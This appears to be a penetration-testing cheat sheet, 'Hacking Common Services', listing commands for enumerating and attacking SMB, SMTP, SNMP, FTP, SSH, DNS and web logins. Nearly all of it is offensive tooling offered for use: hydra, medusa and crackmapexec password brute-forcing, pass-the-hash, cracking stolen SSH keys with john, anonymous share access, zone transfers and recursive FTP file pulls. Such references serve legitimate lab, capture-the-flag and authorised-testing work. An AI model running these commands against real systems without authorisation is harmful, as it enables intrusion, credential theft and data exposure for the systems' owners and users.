Hacking Common Services

smbmap -H 10.10.10.10
smbmap -H 10.10.10.10 -u victim -p password -H 10.10.10.10 [with creds]

smbclient -L 10.10.10.10
smbclient -L //10.10.10.10/tmp

smbclient -U "" //10.10.10.10/anon
smbclient -U "Username" 10.10.10.10
smbclient -U "Username" 10.10.10.10/share-name

smbclient -L \\\\<target-ip>
smbclient \\\\<target-ip>\\<share-name>

smbclient -N //10.10.10.10/tmp --option='client min protocol=NT1' [legacy]

# list all smb scripts
ls -1 /usr/share/nmap/scripts/smb*

# Run with:
nmap -p 445 10.10.10.10 --script smb-os-discovery.nse [single]
nmap -p 139,445 10.10.10.10 --script smb-vuln-* [group]

# scan a subnet for valid netbios names.
nbtscan -r 10.10.10.10/24

Doing NBT name scan for addresses from 192.168.50.0/24

IP address NetBIOS Name Server User MAC address
--------------------------------------------------------------------
192.168.50.124 SAMBA <server> SAMBA 00:00:00:00:00:00
192.168.50.134 SAMBAWEB <server> SAMBAWEB 00:00:00:00:00:00

rpcclient -U "" -N 10.10.10.10
rpcclient -U "Username" 10.10.10.10
$>
$>enum<tabtab>
    enumdomains    enumdomusers    enumdomgroups   enumdata    ...
    <All enumeration commands shown>

# Useful rpcclient commands:
srvinfo
enumalsgroups domain
enumalsgroups builtin
enumdomusers
lookupnames "Username"
queryuser <RID>

enum4linux 10.10.10.10

hydra -L users.txt -P passwords.txt 10.10.10.10 smb -V

# the /all keyword, lists the administrative shares ending with the dollar sign.
net view \\dc01 /all
net view \\$IP /all

SMB Enumeration
  crackmapexec smb <target-ip>

Username & Password Validation
  Single:
      crackmapexec smb <target-ip> -u 'username' -p 'password'
  Multi:
      crackmapexec smb <target-ip> -u users.txt -p passwords.txt
    
List Shares
  crackmapexec smb <target-ip> --shares

Spider Shares
  crackmapexec smb <target-ip> --spider 'password'

Enumerate Sessions & Users
  crackmapexec smb <target-ip> --sessions
  crackmapexec smb <target-ip> --users
  
Pass-the-Hash
  crackmapexec smb <target-ip> -u 'username' -H 'hash_here'

# The VRFY command is used to verify the existence of a specific user or email address on the mail server.

nc -nv 192.168.50.8 25
(UNKNOWN) [192.168.50.8] 25 (smtp) open
220 mail ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root          [ User Existed ]
VRFY idontexist
550 5.1.1 <idontexist>: Recipient address rejected: User unknown in local recipient table

# The EXPN command is used to request the server to provide information about a mailing list, which may contain valid email addresses or usernames.
EXPN mailinglist@example.com

Test-NetConnection -Port 25 192.168.50.8

Banner Grab
  nc <target-ip> 25

Anon Access
  HELO myname
  VRFY user@example.com
  
Send Email  
  MAIL FROM:<test@example.com>
  RCPT TO:<recipient@example.com>
  DATA
  Subject: Test email
  This is a test email.
  .

use snmpwalk with 'public' community string 
  snmpwalk -c public -v1 -t 10 $IP

enumerate a specific MIB subtree
  snmpwalk -c public -v1 $IP 1.3.6.1.4.1.77.1.2.25

enumeration
  onesixtyone -c community -i ip_list.txt

Banner Grabbing
  nc <target-ip> 21
  
Anonmous Logins
  ftp <target-ip>
  <enter>

  ftp <target-ip>
  >anonymous
  ><enter>
  
Brute Force
  medusa -h <target-ip> -U userlist.txt -P password-file -M ftp

Vulnerability Scan
  nmap -p 21 --script=ftp-* <target-ip>
  
Pull All Files
  wget -r ftp://Anonymous:pass@$IP

Banner Grab
  nc <target-ip> 22
  
Brute Force
  hydra -l username -P password_list.txt ssh://<target-ip>
  
Enumeration
  ssh-enum
  
SSH Login w/ Key:
  ssh -i id_rsa [username]@[target_IP_or_hostname]
  
SSH Tunnelling
  └─$ ssh -L 10000:127.0.0.1:10000 user@10.10.10.10
  
Crack SSH Keys
  ssh2john id_rsa > id_rsa_for_john.txt
  john --wordlist=/path/to/wordlist.txt id_rsa_for_john.txt

# dig
ToxSec@Hack:~$ dig +short @10.10.10.10 A www.toxsec.com

# whois
ToxSec@Hack:~$ whois toxsec.com

# host
host www.toxsec.com
host -t mx www.toxsec.com

# nslookup
nslookup mail.toxsec.com

# dig
dig axfr @<TARGET-DNS-SERVER> <DOMAIN-NAME>
dig axfr @n1.toxsec.com toxsec.com
dig axfr @10.10.10.10 20.20.20.20

# nslookup
nslookup
set type=AXFR
server nameserver

domain
server ns1.toxsec.com
toxsec.com

# host to check if a subdomain exists:
host fake.toxsec.com
Host fake.toxsec.com not found: 3(NXDOMAIN)

# used with a wordlist of hostnames:
for ip in $(cat list.txt); do host $ip.megacorpone.com; done

# Fierce
fierce -dns <DOMAIN-NAME>

# Sublist3r
sublist3r -d <DOMAIN-NAME>

# amass
amass enum -d <domain name>

# Gobuster
gobuster dns -u <DOMAIN-NAME> -w <WORDLIST>

# Nmap
nmap 10.10.10.10 --script dns-brute
nmap 10.10.10.10 --script dns-brute --script-args dns-brute.domain=toxsec.com
nmap 10.10.10.10 --script dns brute dns-brute.hostlist=/home/dns/wordlist.txt

# MX
dig mx <DOMAIN-NAME>
dig +short @10.10.10.10 MX toxsec.com      [Note: No www]

# NS
dig ns <DOMAIN-NAME>

# TXT
dig txt <DOMAIN-NAME>

# CNAME
dig cname <SUBDOMAIN>.<DOMAIN-NAME>

# SRV
dig srv <DOMAIN-NAME>

# Standard Scan
dnsrecon -d toxsec.com -t std

# Domain Scan
dnsrecon -d example.com

# Zone Transfer
dnsrecon -d example.com -t axfr

# Enumeration
dnsrecon -d example.com -t google

# Subdomains Brute Force
dnsrecon -d example.com -t brt -D /path/to/wordlist.txt

# Reverse DNS Lookup
dnsrecon -r 192.168.1.1-192.168.1.254

$ SRV Record Enumeration
dnsrecon -d example.com -t srv

# Deep information gathering + DNS ZT
dnsenum toxsec.com

# a PHP login page.
└─$ hydra -l <username> -P <password-list> <target> http-post-form "/login.php:<request>:<error-message>"

# Example for password guessing:
└─$ hydra -l R1ckRul3s -P rmwordlist 10.10.47.81 http-post-form "/login.php:username=R1ckRul3s&password=^PASS^&sub=Login:Invalid username or password."

# Enumerate all http nmap scripts
ls -1 /usr/share/nmap/scripts/http*

# Use all http nmap scripts
nmap $IP --script=http-*